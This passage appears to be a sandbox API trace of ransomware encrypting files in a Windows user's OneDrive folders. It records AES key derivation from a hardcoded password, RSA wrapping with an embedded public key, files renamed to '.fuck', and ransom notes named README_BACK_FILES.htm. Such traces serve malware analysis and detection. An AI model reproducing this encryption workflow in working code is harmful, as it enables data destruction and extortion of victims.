[0273.827] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.827] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.827] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.828] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.828] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.828] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.828] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.828] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.828] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.829] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0xd0, lpOverlapped=0x0) returned 1 [0273.829] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xd0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0xe0) returned 1 [0273.829] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0xe0, lpOverlapped=0x0) returned 1 [0273.829] CloseHandle (hObject=0x5d3c) returned 1 [0273.829] CloseHandle (hObject=0x5d48) returned 1 [0273.829] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0273.836] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0273.837] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0273.840] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0273.841] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0273.841] CryptDestroyKey (hKey=0x2fae08) returned 1 [0273.841] CryptReleaseContext (hProv=0x2f29068, dwFlags=0x0) returned 1 [0273.841] FindNextFileA (in: hFindFile=0x2fa748, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0273.841] FindClose (in: hFindFile=0x2fa748 | out: hFindFile=0x2fa748) returned 1 [0273.842] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\readme_back_files.htm")) returned 0xffffffff [0273.842] AreFileApisANSI () returned 1 [0273.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2889418, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0273.842] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cs\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cs\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0273.843] GetFileType (hFile=0x5d4c) returned 0x1 [0273.843] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0273.845] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0273.845] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0273.845] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.845] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0273.845] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0273.845] GetLastError () returned 0x0 [0273.845] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui")) returned 0x20 [0273.846] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0273.848] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0273.849] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\cy-gb\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0273.850] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\cy-gb\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0273.851] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f29288) returned 1 [0273.853] CryptCreateHash (in: hProv=0x2f29288, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0273.853] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0273.854] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0273.854] CryptDeriveKey (in: hProv=0x2f29288, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fae08) returned 1 [0273.854] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0273.854] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0273.854] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f295b8) returned 1 [0273.854] CryptImportPublicKeyInfo (in: hCryptProv=0x2f295b8, dwCertEncodingType=0x1, pInfo=0x2f34310*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f34340*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f34348*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2faec8) returned 1 [0273.854] CryptEncrypt (in: hKey=0x2faec8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0273.855] CryptEncrypt (in: hKey=0x2faec8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f29310*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f29310*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0273.855] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f29310*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f29310*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0273.856] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.858] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.858] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.863] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.863] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.863] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.863] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.863] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.863] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.864] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.864] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.864] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.864] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.873] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.873] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.874] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.874] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.875] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.875] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.875] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.875] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.876] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.876] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0273.876] CryptEncrypt (in: hKey=0x2fae08, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0273.876] WriteFile (in: hFile=0x5d3c, 